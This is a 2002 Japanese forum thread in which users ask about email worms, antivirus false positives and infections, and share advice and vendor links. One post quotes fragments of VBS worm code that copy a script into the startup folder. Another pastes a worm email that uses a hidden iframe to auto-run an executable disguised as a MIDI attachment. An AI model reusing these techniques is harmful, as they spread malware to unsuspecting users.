Badtranceってダイヤルアップ接続をプチプチ勝手に切ったりしますか?
どうも感染しているらしく、友達のPCにウイルスメールを送っているみたい
なんですが、オンラインスキャンしようにも途中で勝手に接続切られて
駆除ツールのDLもできません。
友達の家に来たのはBadtranceだったらしいのですが、本当にうちから送られたのかは
確かめる前に消したらしく、もしかしたらほかのウイルスかも・・
ちなみにWIN98SEです。

639 :名無しさん@お腹いっぱい。:02/07/09 16:31
>>638 回線切って、アンチウィルスソフト買ったら?
接続してるとどんどん撒き散らしてるのはわかるよね。加害者なんだよ。
ちなみに、”Badtrans”だよ。

640 :名無しさん@お腹いっぱい。:02/07/09 16:40
>>639
すみません・・ぱにくってて接続してたら撒き散らすことを忘れていました・・
帰りにソフト買ってみます。(いまは学校からで、家のは切ってあります)
お返事ありがとうございました。


641 :名無しさん@お腹いっぱい。:02/07/09 17:02
今日MXで動画を交換でDLさせて貰った相手から
「すいません。さっきのファイルにウイルスが入ってました。
しかも、たちの悪いことにどっかのキチガイのお手製なんで
アンチウィルスソフトにも引っ掛りません。
もし既に再生してたら連絡ください。」
ってIMが来てて、そのIMに気付いた時にはその人は、
既にオフラインになってて連絡の取り様がないんで困っています。

既に再生してしまってたんで、色々検索して調べてみたんですが、
Mpegのファイルでウィルスに感染する事は無いと書いたページが
有ったんで、ただのイタヅラかと思っているんですが、、、。

一応オンラインウイルススキャンをしてみても何も引っ掛りませんでした。

642 :名無しさん@お腹いっぱい。:02/07/09 17:05
それは、ご愁傷様。

643 :名無しさん@お腹いっぱい。:02/07/09 17:27
てか最低限の知識も無いヤシがMXとかしてるからこんなに
ウンコみたいなウィルスとか広まるんだよなあ

644 :名無しさん@お腹いっぱい。:02/07/09 17:45
>>643 「ウィルス」ではない。前段は同意。

645 :名無しさん@お腹いっぱい。:02/07/09 18:36
っていうか、実際Mpegファイルを見ただけでウイルスに
感染する事なんてないよ。、、、、、ね?

646 :名無しさん@お腹いっぱい。:02/07/09 18:52
また来ました。怪しげなメールです。
件名が「customer」「mitsuto」「kazuya」「kanime」の4通のメールで、
メールサイズがいずれも130KB前後。
来た覚えがあるって人はレスください。



647 :646:02/07/09 19:04
どうやら4通ともウィルスのようでした。
Hotmailをブラウザからみると、本文の部分のHTMLに書かれたコードも
全部抹消してしまうみたいなので、
ウィルスの種類までは特定できませんでした。
とりあえず、ありがとうございました。


648 :名無しさん@お腹いっぱい。:02/07/09 19:30
ちょっとマジ質問。
今日(七月九日)の午後四時くらいから、
2チャンネルのニュース速報+にアクセスした途端、
ノートンアンチウィルスがVBS.LOVELETTER.Aを検出しました。
検出場所はTemporary internet filesにおいてです。
他の板にアクセスした場合も検出することがあるみたいなんですが、
皆さんのは大丈夫でしょうか?

649 :名無しさん@お腹いっぱい。:02/07/09 19:31
http://pc.2ch.net/test/read.cgi/sec/1025872269/

650 :名無しさん@お腹いっぱい。:02/07/09 19:35
ああ、ノートン先生の誤反応らしいわけで既出っぽいですね。
失礼失礼。

651 :cheshire-cat:02/07/09 20:12
あっけなく流されているけど、かなりネット慣れしているっぽい人がいる。。。。。

652 :666あげ:02/07/10 15:32
>>645
残念ながらあります。
win2000で強制シャットダウンしたmpgも経験あり。
http://mxtrojan.tripod.co.jp/

653 :味噌汁 ◆pUtiqHPc :02/07/10 15:50
>>648
今さっきいきなりでてビックリした…
書き込みしようとしたらで意味不明だったけど誤反応だったのね。
安心した…

654 :名無しさん@お腹いっぱい。:02/07/10 16:14
>>652 拡張子mpgに偽装してあるだけで、実際はmpegじゃねーじゃねーか。

655 :名無しさん@お腹いっぱい。:02/07/10 16:19
大体ウィルスの定義わかって言ってるのか小一時間・・・

656 :名無しさん@お腹いっぱい。:02/07/10 16:29
緊急!!「NortonAntivirus」でウィルスが検出されました。修復できませんでした。」
とでました。この場合どういう処置をとればいいのでしょうか?
どなたかおしえてください。困っています・・・。グスン。

657 :名無しさん@お腹いっぱい。:02/07/10 16:30
ウィルス名も書かないでわかると思ってるのか小一時間・・・
過去ログ読む気も無いのか小一時間・・・

658 :名無しさん@お腹いっぱい。:02/07/10 16:35
>>656 検疫されてるだろ。レポートの検疫のところ見ろ。ついでに削除も
してしまう。

659 :名無しさん@お腹いっぱい。:02/07/10 16:38
>>656
お前ニュー速+でコピペしまくってる奴じゃないか?

660 :656:02/07/10 16:51
VBS.Network.Eっていうやつです。
>>659
違います

661 :名無しさん@お腹いっぱい。:02/07/10 16:54
だから過去ログよめ
大体658に書いてあんだろ

662 :名無しさん@お腹いっぱい。:02/07/10 17:05
2ch見てると VBS.LoveLetter.Aに感染したんだけど、なんなの???

663 :名無しさん@お腹いっぱい。:02/07/10 17:06
過去ログ読め

664 :662:02/07/10 17:07
激しく既出ですた。。すまんこ

665 :名無しさん@お腹いっぱい。:02/07/10 17:15
2ちゃんでノートンが反応したのは、感染ではなく検出なんだから騒がなくてよろしい。

どうしてそこらへんが分からないのか…

666 :名無しさん@お腹いっぱい。:02/07/10 17:23
農豚がデカデカと「感染」って出すからだろー
先生はちょっと頭がおかしい

667 :名無しさん@お腹いっぱい。:02/07/10 17:28
「何か気になる点を教えてもらえますか?」
「夜中、犬の様子が変だったんです。」
「あの犬は夜中、何もしませんでしたよ?」

「だから、変なんです。」 と、シャーロックホームズは言った。

668 :名無しさん@お腹いっぱい。:02/07/10 17:30
これにウィルスはいってないかどうか教えて。
http://dms100.org/worksucks


669 :名無しさん@お腹いっぱい。:02/07/10 17:37
暖房うざい

670 :名無しさん@お腹いっぱい。:02/07/10 17:54
>>668 自分でチェックしな。

671 :名無しさん@お腹いっぱい。:02/07/10 18:46
同じウイルスがよくメールで送りつけられるのですが。
ウイルス送る奴にアドレスが知られてるって事でしょうか

672 :名無しさん@お腹いっぱい。:02/07/10 18:58
>>671 本人が知ってるかはわからないが、感染者のPCの中にあなたのメア
ドが記録されてることは確か。それはアドレス帳の場合もあれば、HPに記
載したメアドや掲示板に書き込んだメアドがキャッシュとなって残ってい
る場合もある。

ただし最近のウィルスは送信者として現れている者が感染者とは限らない
ので、メールの「送信者」欄にある人があなたのメアドを知っているとは
限らない。

673 :671:02/07/10 19:26
>672 ありがとうございます

674 :668は被害者を増やしたいのです。:02/07/10 19:28
668が踏んだため。

675 :名無しさん@お腹いっぱい。:02/07/10 23:15
たすけてください!!!!!!!!!!!!!!
先ほどnorton antivirrusがウイルスを感知しました。
VBS.Network.Eというウイルスらしいのですが、修復も検疫も削除もできません。

どうすればよいのでしょうか?
だれか助けてください!!!!!!!!!!!!!!!!!!


676 :名無しさん@お腹いっぱい。:02/07/10 23:16
お腹いっぱい。

677 :名無しさん@お腹いっぱい。:02/07/10 23:20
さきほど検疫したら直ったみたいです。
おさわがせしてもうしわけございませんでした。
何度もトライすればなおるもんなんですかね?

678 :名無しさん@お腹いっぱい。:02/07/10 23:21
一人で勝手に騒いでるのはお騒がせしたとは言わない

679 :名無しさん@お腹いっぱい。:02/07/10 23:23
つーか過去ログ見ろよ

680 :名無しさん@お腹いっぱい。:02/07/10 23:55
お騒ぎしまして、申し訳ござらん。

681 :名無しさん@お腹いっぱい。:02/07/11 05:50
さっきPC内検索したらskdll.dllって不明アプリがシステムから出てきた
んだけど、これ元々システムフォルダに組み込まれているものですか?
ウイルスだったら思い当たるふしは某UG系ソフト・・・


682 : :02/07/11 06:20
>>681
気にするな

683 :名無しさん@お腹いっぱい。:02/07/11 09:09
>>681
http://www.google.com/search?q=skdll.dll&ie=UTF-8&oe=UTF-8&hl=ja&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=lang_ja

684 :あぼーん:あぼーん
あぼーん

685 :名無しさん@お腹いっぱい。:02/07/11 14:09
>>684 威力業務妨害だよ。令状あればログから書き込み者が割り出せるから
このあたりで止めた方がいいぞ。

686 : :02/07/11 14:16
sage

687 :684は何が書いてあった?:02/07/11 15:09
 

688 :名無しさん@お腹いっぱい。:02/07/11 15:21
>>687
気にするな

689 :名無しさん@お腹いっぱい。:02/07/11 15:45
>>687
俺も元カキコは見てないが、削除依頼を見たところでは
ウィルスメールの送付を依頼する内容だったらしい。

690 :名無しさん@お腹いっぱい。:02/07/11 15:59
>>689
気にするな(w

691 :689:02/07/11 16:15
>>690
うん、わかった。
天気もいいことだし、これからサイクリングにでも逝ってくるよ。

692 : :02/07/11 16:18
うらやますぃ〜

693 :名無しさん@お腹いっぱい。:02/07/11 17:31
info@bpk.co.jp というところからa とだけ書かれたメールがきました。これ何?

694 :名無しさん@お腹いっぱい。:02/07/11 17:32
>>693
NASAの陰謀

695 :名無しさん@お腹いっぱい。:02/07/11 17:53
NSAの謀略

696 :名無しさん@お腹いっぱい。:02/07/11 18:10
NSの策略

697 :名無しさん@お腹いっぱい。:02/07/11 18:19
Nの陰毛

698 :名無しさん@お腹いっぱい。:02/07/11 18:44
ンボマ

699 :名無しさん@お腹いっぱい。:02/07/11 18:49
JS_NOCLOSE
JOKE_MADO.A
BKDR_BO2K
このウイルスの削除の仕方教えてください。
サイトを見てもやり方が解らないんです

700 :cheshire-cat:02/07/11 19:56
>>699
複数のに一度に感染かぁ。
何したのか知らんけど。
検出できないのを喰らってる可能性もあるから、OSクリーンインストールした方がいいんじゃないっしょか。

701 :cheshire-cat:02/07/11 20:17
ちゅうか。
どのフォルダから検出されたのかとか、それはどゆファイルだったのかとか、OS何かとか書いて欲しかった。

MeやXPのシステム復元に使うrestoreフォルダとか、IEのキャッシュから、昔拾ってそのままにしていたzipファイル、とかね。

忙しいのに体調不良なんで、寝まする。

702 :名無しさん@お腹いっぱい。:02/07/11 20:51
すいません。
OSはMEで、RESTOREに感染してました・・・

703 :cheshire-cat:02/07/11 21:00
>>702
気分悪くて、ちょっと夕食吐いてきたところなんですが。
何となく気になって見たら、君のレスがきとりました。

どんぞ。
http://www.trendmicro.co.jp/esolution/solutionDetail.asp?solutionId=2186
http://www.microsoft.com/japan/support/kb/articles/JP263/4/55.asp

ちなみに今回の感染源は、ちょっと変色したカツオの叩きっす。
さっさと嫁でももらって、健康管理してもらった方がいいのかもしれませぬ。

704 :名無しさん@お腹いっぱい。:02/07/11 21:14
湿気高いし暑いから生ものは注意せなあかんよ。

705 :名無しさん@お腹いっぱい。:02/07/12 00:01
ろくきゅうご
あんたも俺も、すでに盗聴対象です

706 :名無しさん:02/07/12 01:29
なぜか急に「閉じる」「最小化」とかパソコンのあらゆる項目などがギリシャ文字みたいな
やつに変わってしまったんですがこれはウイルスですか?あとワードなどで印刷したり
したらパソコン上に表示されてるやつと印刷した文字が違うんです。どなたか親切な方
教えてください。ウイルスであればどうすれば直りますか?


707 :名無しさん@お腹いっぱい。:02/07/12 01:41
≪Super FAQ≫
・最大化・最小化ボタンが数字or記号に!
http://homepage2.nifty.com/winfaq/fontstrouble.html

印刷時の文字が違うってのはどう考えてもウィルスの仕業じゃ
無いと思うんだが。激しくいた違いなのでビジネスソフト系の板
にでも行って質問すれ

708 :名無しさん@お腹いっぱい。:02/07/12 01:44
>>706
プリンタのケーブルの確認と設定の見直し。
まずはそこから。

709 :名無しさん:02/07/12 10:40
707さん708さんありがとうございました!!やってみます!

710 :名無しさん@お腹いっぱい。:02/07/12 23:21
W32.Kitro.C.Wormウィルスに感染したみたいです。
ネットで調べたら、Kitro.Aは載っていて、MSNメッセンジャー経路の
ウィルスだと分りました。
でも、情報が少なく、またKitoro.Cについては、探しても
見つけることができません。
ちなみに、ノートンでは、削除などできない、と出てしまって、
どうやって駆除すればいいか、教えてください。
お願いします。

711 :名無しさん@お腹いっぱい。:02/07/12 23:24
http://securityresponse.symantec.com/avcenter/venc/data/w32.kitro.c.worm.html
これちゃうの

712 :710:02/07/12 23:41
>>711
それです、それ!!
本当にありがとうございます。
助かりました。
これから、さっそく読んで、解決します。
m(._.)mペコッ


713 :名無しさん@お腹いっぱい。:02/07/12 23:46
携帯電話が感染ていうのはありますでしょうか?
チェーンメールで送られてきて下のカーソルが効かなくなってしまいました。

714 :名無しさん@お腹いっぱい。:02/07/12 23:58
>>706-708
サンキョ!オレも706と同じ状態で、
すぐに治ったYO!

715 :名無しさん:02/07/13 01:36
MXで動画をダウンロードして開いたら突然電源が切れました。すぐ再起動し
て特に問題はなかったのですが、それ以来パソコンを起動してディスクトップ
画面がでると電源が切れ、再起動しスキャンディスクが終了してまた同じこ
とを繰り返す・・・、こういった症状が頻繁に起こるようになったのです。
ウィルスでしょうか?
この症状を御存知の方、情報をお待ちしています。宜しくお願い致します。

716 : :02/07/13 02:12
218.50.39.122
ここから攻撃されたよ。

717 :名無しさん@お腹いっぱい。:02/07/13 03:01
ありがとう>>682-683

718 :名無しさん@お腹いっぱい。:02/07/13 05:06
>>713
ウイルスではなく、バグです。電源を切れば直ります。
画像読み込みをしなければ発生しません。

719 : :02/07/13 07:10
>>15
死ね

720 :名無しさん@お腹いっぱい。:02/07/13 11:52
だれか教えてください。
画像ファイルが勝手に「あぼーん」に置き換わるんですが。
ちなみに、OPERAもやられたか、デスクトップにも小さく「あぼーん」と・・・。



721 : :02/07/13 12:17
>>720
幻覚症状だ

722 :名無しさん@お腹いっぱい。:02/07/13 12:29
>>720
スクリーンショットうpしろ。

723 :名無しさん@お腹いっぱい。:02/07/13 13:19
>>720
MXやってたろ。

724 :名無しさん@お腹いっぱい。:02/07/13 13:22
>>720 MXやめて再インスコしろ。

725 :すみません:02/07/13 13:28
IE5のテンポラリーファイルで
「VBS.NETWORK.E」ウィルスが検知されました
これって単純にデリートされるんですか?

どうもクレ板のキャッシュみたいなんですけど



726 :名無しさん@お腹いっぱい。:02/07/13 13:42
>>725
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/
ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

727 :すみません:02/07/13 13:47
ガイシュツだったんですね
イタズラとのことですが、一応DELLしました

ありがとうございました

728 :名無しさん@お腹いっぱい。:02/07/13 14:08
DELL

Dell Computer
http://www.dell.com/jp/

729 :名無しさん@お腹いっぱい。:02/07/13 14:14
4500Cは確かに買い得かもな・・・

730 :ご相談:02/07/13 16:14
KOPIGDKO.EXE
という添付のメールが届きました。
送信者も賢明も書いてありませんでした。
ウイルスでしょうか?
トレンドマイクロで検索しましたが出てきませんでした。
どなたかご存知だったら教えてください。
よろしくおながいします

731 :j:02/07/13 16:14
http://js-web.cside.com/

732 :名無しさん@お腹いっぱい。:02/07/13 16:20
開けてみれば分かる。

733 :名無しさん@お腹いっぱい。:02/07/13 16:36
>>730 分からなければ捨てよ。アンチウィルスソフト常駐させよ。

734 :名無しさん@お腹いっぱい。:02/07/13 17:59
KO*KOでピンと来ないもんかね

735 :名無しさん@お腹いっぱい。:02/07/13 20:46
最近フリーズが多いんですけど、ウイルスでしょうかね?
そんな症状を生み出すウイルスっていますか?

736 :名無しさん@お腹いっぱい。:02/07/13 20:50
最近なんでもかんでもウィルスのせいにする奴が多いんですけど、ウィルスでしょうかね?
そんな症状を生み出すウィルスっていますか?

737 :プッ:02/07/13 21:04
>>730
     ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄
    ( ´∀`)< 今時HYBRISかよ
    (    ) \_______
    | | |
    (__)_)

738 :名無しさん@お腹いっぱい。:02/07/13 21:45
>>736
>なんでもかんでもウィルスのせいにする奴
奴ではありません、それがウィルスです。
一過性のものと慢性のものがあります。
濡れ衣を着せられる前に逃げましょう。

739 :名無しさん@お腹いっぱい。:02/07/13 21:48
今の地震はウィルスのせいですか?

740 :646:02/07/13 21:51
最近、BadtransやKlezが毎週末(特に金曜日)4〜5通届きます。
このことで、メアド変更しようとも考えているのですが、
これって、誰か(クラッカー組織など)が狙ってると考えてもいいのですか?


741 :名無しさん@お腹いっぱい。:02/07/13 21:54
そうだね貴方が組織に狙われるほど凄い人ならね。

742 :740:02/07/13 22:01
>>741
俺はそんなに凄くないYo!
でも、こう毎週毎週来るって明らかにおかしいんだけど・・・。

743 :ちょっちお尋ねしますが・・:02/07/13 22:08

横レス失礼します。。。

あの〜次期転職先からメールがきまして、返事だそうとしたんですが、先方はボッキー2とかっていうメーラー使ってるので、こっちが思いっきりアウトルックエキスプレスってなんだか・・・初心者っぽいじゃないですか?
そこで、ヘッダーをちょこちょこイジって、かっこよくしようと思うんです。。。

そこで諸先輩方のご助言なんですが、かっこよくメールする方法をお尋ねしたいんですが・・・Telnetとかあんまりメンドーなのは(^^;;;
なんか、ヘッダー部分のイジれるメーラーみたいなのとか、教えて頂きたいんですが。。。まじぽんレスです。

※  リメーラーとか使うと、選考落ちそうなので(笑)他で何かありまでんでしょうか?
※  http://www.big-z.net の Formrun Ver1.33(非会員用)のメーラーって何となく凄そうなのですが・・・如何でしょうか?




744 :名無しさん@お腹いっぱい。:02/07/13 22:14
>>744
思いっきり板間違ってないか?

745 :744:02/07/13 22:15
失礼。>>743でした。
自分に返してどーすんだ・・・。

746 :名無しさん@お腹いっぱい。:02/07/13 22:16
言ってること自体間違ってるだろ

747 :名無しさん@お腹いっぱい。:02/07/13 22:23
>>743
ポスペつかう
これなら本採用まちがいなし

748 :名無しさん@お腹いっぱい。:02/07/13 22:26
>>743
好きなだけヘッダ偽装しろ。
http://homepage2.nifty.com/spw/radish/dl.html

でも、たぶんアンタ落ちるよ・・・

749 : :02/07/14 02:04
さいきん、2chのスレッドを閲覧すると、メール欄に記入のあるハンドル
名のあるところが(名無しさん@お腹いっぱいみたいな)、
青でなく紫色で表示される事が多くなったんだけど、
これってウィルスに感染したせいなんですか。
一応ノートンを入れてあるんだけど。




750 :名無しさん@お腹いっぱい。:02/07/14 04:02
だから
なんでもかんでもミソもクソもウィルスのせいにすんな
初心者がウィルスですか?ってのの98%は自分の操作の結果だからな
IEのキャッシュ消してブラウザ再起動すれ

751 :名無しさん@お腹いっぱい。:02/07/14 13:06
最近、毎日のようにバッドトランスが添付されたメールが送りつけられます。その都度送信者は違うのですが、
どうもメッセージのタイトルとかが、ある事件をきっかけに疎遠になった友人と私だけが知っているような共通項が書かれていたりします。
もし恨みを買っているのなら、いくら考えてもコイツ以外には考えられません。
警察への被害届も考えていますが、どうやったら証拠がつかめるのでしょうか?
独りよがりの質問ですみませんが、教えていただけませんか?
ちなみに私のPCは感染していませんでした。

752 :名無しさん@お腹いっぱい。:02/07/14 13:40
VBS.Network.E
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
VBSInternal
cIf s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
VBS Freelink.B
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)


753 :名無しさん@お腹いっぱい。:02/07/14 13:42
>>751
メールヘッダ

754 :名無しさん@お腹いっぱい。:02/07/14 15:31
トロイの木馬の感染経路を教えてください。
添付メール?HP見れば?
おねがいします。

755 :名無しさん@お腹いっぱい。:02/07/14 15:37
>>754
いろいろ

756 :名無しさん@お腹いっぱい。:02/07/14 16:32
トロイの木馬?HP見れば?

757 :名無しさん@お腹いっぱい。:02/07/14 17:03
>>752反応ないよ(´・ω・`)ショボーン

ウィルスバスダが反応するのないの?????
定義アップやエンジン更新してんだけど1度も動かないよ------

758 :名無しさん@お腹いっぱい。:02/07/14 17:22
>>757
そこをテキストファイルにコピペして、拡張子を変えれば反応するだろ。

ttp://www.trendmicro.co.jp/support/download/eicar.htm
もしくはeicarやっとけ。

759 :名無しさん@お腹いっぱい。:02/07/14 17:23
>>757
ノートンが過敏に反応しているだけ。

760 :初めて感染しますた。:02/07/14 18:21
日付: 2002/07/14 、 時刻: 17:41:18
圧縮されたファイル (l50[1]) は右ファイル内にある (C:\Documents and Settings\漏れの名前\Local Settings\Temporary Internet Files\Content.IE5\89ATCDEX\l50[1]) は VBS.LoveLetter.A ウィルスに感染しています。
ファイルを修復できません。

日付: 2002/07/14 、 時刻: 17:41:18
ファイル C:\Documents and Settings\漏れの名前\Local Settings\Temporary Internet Files\Content.IE5\UB4NU7WX\lame[1].htm は Trojan Horse ウィルスに感染しています。
ファイルを修復できません。

初めてノートン先生のお世話になったのですが、検出は出来たけど、その後駆除処理に移りません。
漏れは一体どうすれば良いのでしょうか?(´Д`;)

あと、ウィルスバスター(トレンドマイクロから落とした体験版)では
検出すらしてくれなかったのですが、こんなもんなんでしょうか?

761 : :02/07/14 18:25
>>760
手動でそのファイルを削除

762 :初めて感染しますた。:02/07/14 18:35
>>761さん。
レスありがとうございます。
さっそく試してみましたが、ファイルを検索しても見つかりません。
89ATCDEXやUB4NU7WXなんてフォルダも無いです。
漏れはこのままTrojan Horseに怯えなければならないのでしょうか? (´Д`;)

763 :名無しさん@お腹いっぱい。:02/07/14 18:41
>>762
エクスプローラで似たファイル名まで検索するか、IEのキャッシュを
削除

764 :名無しさん@お腹いっぱい。:02/07/15 09:18
>>760 ウィルスバスターの体験版は定義ファイルがリリースされたときのままで
更新できないから、最新のウィルス・ワームは検出されないことがある。あくまでも
自己の環境で作動するか、使い勝手などを確認するための体験版のようだ。

765 :名無しさん@お腹いっぱい。:02/07/15 09:33
>>764
というか、これに関してはノートンの誤検出だし、ひっかかる必要のないものだと思うが。
ちなみに、バスターは最新定義のものでも反応しない。

通常のウイルスのチェックに関してはその通りですが。

766 :名無しさん@お腹いっぱい。:02/07/15 10:07
>>760 ノートンがvbsウィルスのソースに誤反応
http://pc.2ch.net/test/read.cgi/sec/1025872269/

767 :名無しさん@お腹いっぱい。:02/07/15 14:20
Subject: Re: Your password!
添付ファイル decrypt-password.exe
で、メールサイズが約69KBのこんなメールが
いっぱい届きだした。新種ウィルスか?

--L1db82sd319dm2ns0f4383dhG
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY>
<FONT COLOR=#FF0000>
<b>ATTENTION!</b><br><br>
You can access<br>
<b>very important</b><br>
information by<br>
this password<br><br>
<b>DO NOT SAVE</b><br>
password to disk<br>
use your mind<br><br>
now press<br>
<b>cancel</b><br><br>
(XXXXX XXXXX)</font></BODY></HTML>
<iframe src=3Dcid:W8dqwq8q918213 height=3D0 width=3D0></iframe>

--L1db82sd319dm2ns0f4383dhG
Content-Type: audio/x-midi;
name=decrypt-password.exe
Content-Transfer-Encoding: base64
Content-ID: <W8dqwq8q918213>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAA8AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4g
以下略


768 :名無しさん@お腹いっぱい。:02/07/15 14:22
>>767
のウィルスメールだが、今のところ NTT グループの企業から
やたらたくさん届いている。

769 :名無しさん@お腹いっぱい。:02/07/15 14:37
>>767 は、WORM_FRETHEM.E だった。
ここ数日間に感染が増えているらしい。
http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=WORM_FRETHEM.E


770 :名無しさん@お腹いっぱい。:02/07/15 14:42
>>769 アンチウィルス各社対応済みだね。
NTTグループはアンチウィルスソフトいれてないばかりか、古いOE使ってるのか?
最低だな。

771 :age:02/07/15 15:00
>>770
うちは入れてましたが
インテリの方が12日対応済み
ライブの方が17日対応予定で、
タイムラグにやられた感がありますな

772 :名無しさん@お腹いっぱい。:02/07/15 15:00
アンチウイルスソフト(ウイルスバスター)の最新版でもすり抜けたYO!
WORM_FRETHEM.JとWORM_FRETHEM.Eでは違うのかな???

773 :名無しさん@お腹いっぱい。:02/07/15 15:27
私もウイルスバスター最新版を入れてあるのですが、すり抜けてきました。

774 :名無しさん@お腹いっぱい。:02/07/15 16:03
FRETHEM の新しい亜種のようです。
それで、ウィルス対策ソフトでは、まだ検出できない。

775 :名無しさん@お腹いっぱい。:02/07/15 16:27
英語版のWinだけがターゲットですか?

776 :名無しさん@お腹いっぱい。:02/07/15 16:27
>>774 じゃあ、ダイレクトアクションありだからIE/OE使用者はプレビュー
切っておいたほうがいいね。IE6.0/5.5SP2/5.01SP1以外のバージョンの
ひとは必ずバージョンアップすること。

777 :名無しさん@お腹いっぱい。:02/07/15 16:28
>>767
Norton は検出できなかったようです。

778 :名無しさん@お腹いっぱい。:02/07/15 16:31
>>775
関係ないと思う。でなきゃ、こんなに日本で広まらない。

779 :Bocky!:02/07/15 16:33
>>743
ボッキー2 ni warata...



780 :名無しさん@お腹いっぱい。:02/07/15 16:37
InterScanとNAVの最新版でもすり抜けたよ。
新しい亜種っぽいね

こっちは広島大学から来た

781 :名無しさん@お腹いっぱい。:02/07/15 16:38
>>776
誤:IE6.0/5.5SP2/5.01SP1
正:IE6.0/5.5SP2/5.01SP2 だね。
OE(又はIEコンポーネント使用メーラー)の問題点とその対策方法
http://pc.2ch.net/test/read.cgi/sec/1021363841/参照。

782 :あぼーん:あぼーん
あぼーん

783 :名無しさん@お腹いっぱい。:02/07/15 16:47
>>780 NAVの最新って7/12のウイルス対策済み数61664のほう?
7/12付けはIntelligent Updaterで2回定義が更新されたよね。

784 :カケル:02/07/15 16:50
WORM_BADTRANS.Bに感染してからメールが受け取れなくなってしまいました。
既に駆除ツールを使いウィルスは消えたと思うのですが、自分から自分へウィルス付のメールを
送ってこようとしているみたいです。それを削除しようにもメールを受け取ろうとしてもしばらくすると
「応答がありません」とか言われます。で、こんなエラーメッセージが出るのですがどうすればいいでしょう?
サーバーと通信しようとして、タイムアウトが発生しました。 アカウント : 'po-mc.neweb.ne.jp', サーバー : 'po-mc.neweb.ne.jp', プロトコル : POP3, ポート : 110, セキュリティ (SSL): なし, エラー番号 : 0x800CCC19

785 :名無しさん@お腹いっぱい。:02/07/15 16:53
>>784 使っているアンチウィルスソフトは? NAVなら、
「電子メールを受信すると、W32.Badtrans.B@mmが検知された後にメール
受信が停止してしまい、何度受信をやり直しても同じ現象が発生する」
http://service2.symantec.co.jp/consumer/support-kb.nsf/KBLPF/BCC8F415E81FF16049256B250003ACF2?OpenDocument&PRODUCT=Norton%20AntiVirus2002

786 :780:02/07/15 17:00
>>783

NAVCEだから詳しくはわかんないんだけど
7/12Rev19となってる。

787 :名無しさん@お腹いっぱい。:02/07/15 17:06
>>786
Norton AntiVirus Corporate Edition
ウイルス定義ファイルバージョン: 40712s
シーケンス番号: 17848 かな?

788 :名無しさん@お腹いっぱい。:02/07/15 17:18
いろんなとこから新種ウイルスがなだれ込んでくるよ〜
うちの会社は完全にメールを止めた。トレンドマイクロは
現在パターンファイルを開発中。直接聞いた。



789 :780:02/07/15 17:18
とりあえずトレンドマイクロからの情報を

WORM_FETHEMの亜種は現在のパターンでは検出出来ませんが
30分後に配布するパターン317で対応します。
Interscanの話ですが

790 :名無しさん@お腹いっぱい。:02/07/15 17:21
「Re:Your Password!」の件名に注意,新種ウイルスが国内で流行の兆し
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20020715/1/

791 :名無しさん@お腹いっぱい。:02/07/15 17:26
「Re:Your Password!」 JPNICのメーリングリストから届いたよ。
でもこれを購読している人って少なそうだから影響は無いかな?

792 :名無しさん@お腹いっぱい。:02/07/15 17:31
>>789
17:00頃にはできると聞いたが、現時点でまだ出来ていない模様。

793 :780:02/07/15 17:32
30分に対応するって話ですが
遅れてるみたいです。



794 :780:02/07/15 17:32
かぶった。スマソ

795 :あぼーん:あぼーん
あぼーん

796 :名無しさん@お腹いっぱい。:02/07/15 17:39
>>795 ドサクサにまぎれて不正アクセス禁止法違反ですか?

797 :名無しさん@お腹いっぱい。:02/07/15 17:41
通報しますた

798 :名無し:02/07/15 17:42
俺のサイト


799 :名無し:02/07/15 17:44
間違い。他の掲示板で書かれていた。

800 :名無しさん@お腹いっぱい。:02/07/15 17:45
ニュース速報+のスレ

【PC】件名が「Re: Your Password!」メールに注意、新種ウイルスが流行の兆し
http://news2.2ch.net/test/read.cgi/newsplus/1026721442/l50


801 :名無し:02/07/15 17:46
さっきも逢ったよ


802 :名無しさん@お腹いっぱい。:02/07/15 17:46
>>796 >>798-799 IP記録されました。

803 :名無し:02/07/15 17:47
んなこと言われても困ります。
すいませんでした。

804 :名無しさん@お腹いっぱい。:02/07/15 17:48
nikkeibpからも「Re: Your Password!」MLに来たよ。
HTMLメールはじく設定だったから助かったけど。

805 :名無し:02/07/15 17:49
不正アクセス禁止法ってどんなんですか?

806 :名無しさん@お腹いっぱい。:02/07/15 17:51
>>805
強姦です。

807 :名無し:02/07/15 17:52
俺は捕まるんですか?

808 :名無しさん@お腹いっぱい。:02/07/15 17:54
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.frethem.j%40mm.html

809 :名無しさん@お腹いっぱい。:02/07/15 17:54
>>807
強姦したんですか?

810 :名無し:02/07/15 17:55
勿論してません

811 :名無し:02/07/15 17:56
IP記録とかかいてあったから

812 :名無しさん@お腹いっぱい。:02/07/15 17:56
じゃぁ、何で捕まると思ったの?

813 :名無しさん@お腹いっぱい。:02/07/15 17:57
だいぜうぶ、ついでにメーラー変えとけ。

814 :名無し:02/07/15 17:58
不正アクセス禁止法ですよ。あー、焦った。

815 :名無しさん@お腹いっぱい。:02/07/15 18:00
そういやたかがゲームで不正アクセス禁止法違反して捕まった奴らには笑ったなぁ(w

816 :名無し:02/07/15 18:01
そんなんがあったんですか。確かに笑えます。

817 :名無し:02/07/15 18:04
奴らということは複数人…

818 :名無しさん@お腹いっぱい。:02/07/15 18:04
たかが2chのカキコtで捕まる>>816の方が笑える。

819 :名無しさん@お腹いっぱい。:02/07/15 18:05
To: フィールドに大量のアドレスを並べて、
「ウィルスのお詫び」を送ってきやがった。
Bcc で送れよ。

820 :名無し:02/07/15 18:05
え?やっぱり俺は捕まるんですか?

821 :Bocky!:02/07/15 18:08
>>819
warata

